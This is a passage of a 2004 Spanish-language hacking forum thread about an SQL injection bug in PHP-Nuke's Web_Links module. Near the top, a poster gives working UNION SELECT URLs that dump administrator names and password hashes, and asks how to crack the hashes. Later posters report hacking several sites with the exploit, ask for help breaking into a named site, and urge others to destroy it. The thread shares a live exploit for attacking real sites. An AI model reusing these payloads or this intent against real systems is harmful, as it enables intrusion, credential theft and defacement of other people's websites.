Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
07 Febrero 2006, 20:21  

+  Foro de elhacker.net
|-+  Hacking
| |-+  Bugs y Exploits (Moderador: Sirdarckcat)
| | |-+  exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 [2] 3 4 Ir Abajo Imprimir
Autor Tema: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....  (Leído 13294 veces)
[Ky3zZ]
****
Desconectado Desconectado

Mensajes: 48


Basta YA!!!


Ver Perfil WWW
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #15 en: 10 Febrero 2004, 03:50 »

Realmente funciona
Para el PHP-Nuke y el Modulo WebLinks:

Para que muestre todos los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Y para que muestre los Password Codificados de los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20

Pero tengo una duda como puedo crackear con el Cain el PWL? es que no lo entiendo.. por mas que traduzco manuales del cain al español no se como crackear el pasword si alguien sabe algo... que me mande un e-mail: juan_lux@hotmail.com
En línea

El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
[Ky3zZ]
****
Desconectado Desconectado

Mensajes: 48


Basta YA!!!


Ver Perfil WWW
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #16 en: 16 Febrero 2004, 09:20 »

Weinas...oyes yo me preguntaba por casualidad... habria forma de saltarse la proteccion esa?
Es que no me acorde de guardar el Pass en MD5 y ahora an puesto la proteccion en la web donde lo hice y no se... amos que yo me preguntaba eso que si habia alguna manera de poder saber de nuevo el pass saltandose la proteccion..? ??? ??? ???
En línea

El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
CamelSmoke
****
Desconectado Desconectado

Mensajes: 1


semerrompiolabarraespaciadora


Ver Perfil WWW
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #17 en: 20 Febrero 2004, 19:28 »

En realidad el Password MD5 no se saca de ninguna de esas maneras...bah, tal vez con el spaniz nuke, pero PHP-Nuke no muestra los pass MD5, al menos aun no encontre la forma de verlo ni encriptado ni nada, lo cual me gustaria ya que quiero asegurar mi sitio en PHP-Nuke.
En línea

CamelSmoke® - bibliobar.com.ar
p47ch
Visitante


Email
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #18 en: 04 Marzo 2004, 23:54 »

Disculpar mi ignorancia, pero como se que versión de nuke esta utilizando dicha pagina?

Pues algunas no  lo dicen !

Gracias ! tongue



Ademas me sale lo sig:

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 238

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286


y


Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286


Cuando pongo

http://www.el-dominio.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Por q ?
« Última modificación: 05 Marzo 2004, 00:15 por p47ch » En línea
[Ky3zZ]
****
Desconectado Desconectado

Mensajes: 48


Basta YA!!!


Ver Perfil WWW
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #19 en: 05 Marzo 2004, 01:57 »

Eso es muy facil, te salen los errores de la base de datos.. porque? pues por que la web donde as realizado el bug no tiene activado el modulo de Web_Links o simplemente a borrado ese modulo como preteccion.
Lo que sacamos encuenta.. que no se puede hacer en esa web.
En línea

El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
CELL
****
Desconectado Desconectado

Mensajes: 18


Wazzup....


Ver Perfil
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #20 en: 22 Marzo 2004, 21:46 »

No faltan los lammers http://hack.csxv.net Angry

Fijense en "WEB HACKEADAS"  undecided\ y dense una vuelta por el foro las risas estan garantizadas por ejemplo en estos post

http://hack.csxv.net/modules.php?name=Forums&file=viewtopic&t=36


http://hack.csxv.net/modules.php?name=Forums&file=viewtopic&t=117


 :o

« Última modificación: 22 Marzo 2004, 22:12 por CELL » En línea
[Ky3zZ]
****
Desconectado Desconectado

Mensajes: 48


Basta YA!!!


Ver Perfil WWW
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #21 en: 28 Marzo 2004, 14:35 »

 Angry Angry Se jodio se jodio... que ya no vale este exploit para el php-nuke de la nueva version... ya que viene con sus protecciones
En línea

El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
X
****
Desconectado Desconectado

Mensajes: 1


Destruyan www.animexico.com.mx


Ver Perfil
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #22 en: 31 Marzo 2004, 20:27 »

No ma, necesitamos nuevas cosas para nuke, sacan muy pronto los patches para los bugs y exploits.

A ver si alguien le hecha también una chekada a esto, una pagina sin patches toda sin tecnología hecha en el 2002 sin ninguna actualización y no la puedo tomar ni meterme como admin, he tratado todos los exploits y sqlinjection del mundo y no he podido, es fusión de phpbb y php nuke pero lo que no entiendo es como diablos tiene seguridad si esta en phpnuke 5.5 y phpbb2.0.4 es imposible uqe no la haya podido tomar he tratado 4 meses, ninguna page se me ha resistido tanto, a ver si alguién me ayuda con esto www.animexico.net es la page, hagan la prueba y veran que se frustraran jajaj si necesito ayuda aca un nuevo exploit a lo mejor sirve.
En línea

Unidos todos los hackes para destruir animexico.com.mx o animexico.net o anicast.com.mx ya que ellos nos dicen lammers a nosotros.

X - "THE RING MUST BE DESTROYED"

I can see in your eyes, the same fear that could take the heart of me, a day may come when courage of man fails, when we forsake our friends and break all bonds of fellowship, but this is not this day, TODAY WE FIGHT!
oRTNZ
****
Desconectado Desconectado

Mensajes: 721


Seeeee O-Wola


Ver Perfil
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #23 en: 31 Marzo 2004, 22:37 »

esta parchado, busca otro bug,suerte
En línea

el 31 de 2005, un dia que nunca olvidare y me llevare conmigo ese sentimiento tan bonito llamado amor,hasta el dia en que se me acabe el aliento.
[Ky3zZ]
****
Desconectado Desconectado

Mensajes: 48


Basta YA!!!


Ver Perfil WWW
Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #24 en: 12 Mayo 2004, 05:20 »

Wenas...

Ya nadie actuliza esto?? porque yo tengo una dudita.. el día 10 uno usuarios (por llamarlos asi) me se infiltraron en mi web de php-nuke 7.2 borrandome y cambiandome varias cosas del web ( y ellos me dejaron un mensaje diciendo que la habian hackeado... y que yo era un lammer)(la verdad no se quien es mas lammer si ellos o yo), ahora la he tenido que borrar de nuevo y volverla a subir... esto ya no me va a volver a pasar.. porque,ya que e puesto logers y algunas cosillas para que me de total información de quien entra o sale de la pagina solo digo que la proxima vez que ocurra ya no borrare la pagina si no que denunciare a los usuarios maldiciosos llevando a la guardia civil todos los corresponidientes documentos que piden para una denuncia requeridad por la legislación española.

Ahora esta es mi duda... que bug puede tener el php-nuke7.2, si estan con los correspondientes parches??? ha salido algun bug nuevo?

Saludos.

P.D.: Los usuarios maldiciosos que borraron y/o jodieron mi web me dejaron http://www.elhacker.net y "emulanetwork" de referencia, asique supongo que serán usuarios registrados aquí.
En línea

El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
oRTNZ
****
Desconectado Desconectado

Mensajes: 721


Seeeee O-Wola


Ver Perfil
Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #25 en: 12 Mayo 2004, 05:56 »

Si la hay es esta
http://foro.elhacker.net/index.php/topic,31009.0
man no se si en este foro se dedican a este tipo de cosas o NO,solo se que cualquiera puede haber hecho eso....
si hubieran dejado de referencia www.microsoft.com y de alias bill-gates tambien comentarias esooo,supongo que NO...,saludos
En línea

el 31 de 2005, un dia que nunca olvidare y me llevare conmigo ese sentimiento tan bonito llamado amor,hasta el dia en que se me acabe el aliento.
Nuker
*
Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #26 en: 10 Junio 2004, 16:38 »

para encriptar un password en MD5:

http://www.elhacker.net/encriptador.htm

Para crackearlo con el cain

bueno si ya lo sabian no puteen  grin
En línea
satan_31337_hack
*
Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #27 en: 09 Julio 2004, 13:50 »

ME A FUNCIONADO DE MARAVILLA EL EXPLOIT YA E HACKIADO VARIAS WEBS!!!!!! GRACIAS A TODOOOOOS!!!!!!!!!!!  8)
En línea
CEROX
*
Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #28 en: 12 Julio 2004, 11:16 »

alguien tan hamable me puede decir como se si la pagina es vurnerable o es php nuke gracias!!!
En línea

XDDDDD
viruss1362
***
Desconectado Desconectado

Mensajes: 133



Ver Perfil
Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #29 en: 12 Julio 2004, 14:03 »

joder CEROX eso es facil, php nuke se caracteriza por muchas cosas si eso hazte una web en php nuke y veras lo k tiene en especial  tongue enga machote k tu puedes xDD
En línea

Más vale parecer un idiota con la boca cerrada, que abrir la boca y demostrar que lo eres
Páginas: 1 [2] 3 4 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  







                Foros de informatica y overclocking

               

Trucos Windows    hard-h2o modding    Videojuegos

Todas las webs afiliadas están libres de publicidad engañosa.

Foro de elhacker.net | Powered by SMF 1.0.6.
© 2001-2005, Lewis Media. Todos los Derechos Reservados.